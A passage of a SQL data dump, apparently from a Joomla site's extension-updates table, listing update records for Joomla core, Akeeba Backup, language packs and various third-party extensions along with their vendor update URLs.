package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(34096,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34097,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34098,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34099,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34100,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(34101,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34102,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34103,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34104,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34105,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(34106,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34107,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34108,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34109,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(34110,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34111,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34112,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34113,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34114,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(34115,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34116,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34117,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34118,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34119,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34120,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34121,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34122,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34123,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34124,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34125,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34126,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34127,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34128,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34129,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34130,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34131,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34132,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34133,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34134,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34135,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34136,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34137,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34138,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34139,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34140,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34141,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34142,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34143,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34144,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34145,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34146,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34147,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34148,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34149,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34150,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34151,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34152,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34153,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34154,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34155,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34156,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34157,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34158,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34159,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34160,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34161,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34162,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34163,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34164,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34165,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34166,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34167,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34168,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34169,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34170,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34171,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34172,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34173,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34174,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34175,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34176,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34177,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34178,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34179,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34180,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34181,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34182,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34183,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34184,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34185,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34186,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34187,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-3.html',''),(34188,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(34189,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(34190,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(34191,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(34192,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(34193,3,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(34194,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(34195,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(34196,3,0,'Danish','','pkg_da-DK','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(34197,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(34198,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(34199,3,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(34200,3,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(34201,3,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(34202,3,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(34203,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(34204,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(34205,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(34206,3,0,'French','','pkg_fr-FR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(34207,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(34208,3,0,'German','','pkg_de-DE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(34209,3,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(34210,3,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(34211,3,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(34212,3,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(34213,3,0,'Greek','','pkg_el-GR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(34214,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(34215,3,0,'Italian','','pkg_it-IT','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(34216,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(34217,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(34218,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(34219,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(34220,3,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(34221,3,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.11.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(34222,3,0,'Polish','','pkg_pl-PL','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(34223,3,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(34224,3,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(34225,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(34226,3,0,'Russian','','pkg_ru-RU','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(34227,3,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(34228,3,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(34229,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(34230,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(34231,3,0,'Spanish','','pkg_es-ES','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(34232,3,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(34233,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(34234,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(34235,3,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(34236,3,0,'Thai','','pkg_th-TH','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(34237,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(34238,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(34239,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(34240,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(34241,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','https://updates.rockettheme.com/joomla/138/b61e70db','',''),(34242,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/138/2084920890','',''),(34243,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','https://updates.rockettheme.com/joomla/286/21ffe006','',''),(34244,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/286/326466299','',''),(34245,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.19','0802','https://updates.rockettheme.com/joomla/287/cb577720','',''),(34246,20,0,'RokBox Plugin','','rokbox','plugin','system',0,'2.0.16','0802','https://updates.rockettheme.com/joomla/301/dfc993d8','',''),(34247,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(34248,20,0,'RokGallery','','','component','',0,'2.46','0802','https://updates.rockettheme.com/joomla/313/1985305838','',''),(34249,20,0,'RokWeather','','','module','',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/313/1307741342','',''),(34250,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','https://updates.rockettheme.com/joomla/313/1301311221','',''),(34251,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/381/337128173','',''),(34252,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/559/1033ef39','',''),(34253,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(34254,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(34255,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(34256,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(34257,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(34258,57,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(34259,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(34260,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(34261,57,0,'Danish','','pkg_da-DK','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(34262,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(34263,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(34264,57,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(34265,57,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(34266,57,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(34267,57,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(34268,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(34269,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(34270,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(34271,57,0,'French','','pkg_fr-FR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(34272,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(34273,57,0,'German','','pkg_de-DE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(34274,57,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(34275,57,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(34276,57,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(34277,57,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(34278,57,0,'Greek','','pkg_el-GR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(34279,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(34280,57,0,'Italian','','pkg_it-IT','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(34281,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(34282,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(34283,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(34284,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(34285,57,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(34286,57,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.11.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(34287,57,0,'Polish','','pkg_pl-PL','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(34288,57,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(34289,57,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(34290,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(34291,57,0,'Russian','','pkg_ru-RU','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(34292,57,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(34293,57,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(34294,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(34295,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(34296,57,0,'Spanish','','pkg_es-ES','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(34297,57,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(34298,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(34299,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(34300,57,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(34301,57,0,'Thai','','pkg_th-TH','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(34302,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(34303,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(34304,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(34305,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(34306,122,0,'Google Structured Data Free','','gsd','plugin','system',0,'5.1.6','','https://static.tassos.gr/update/gsdfree?type=.xml','https://www.tassos.gr/releases/google-structured-data/google-structured-data-5-1-6?format=html',''),(34307,129,0,'JCE 2.9.32','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.32','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-32-released',''),(34308,130,0,'T3 System Plugin','','t3','plugin','system',0,'3.1.2','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml','http://www.joomlart.com/update-steps',''),(34309,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(34310,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34311,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34312,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34313,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34314,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34315,67,0,'Akeeba Backup Core 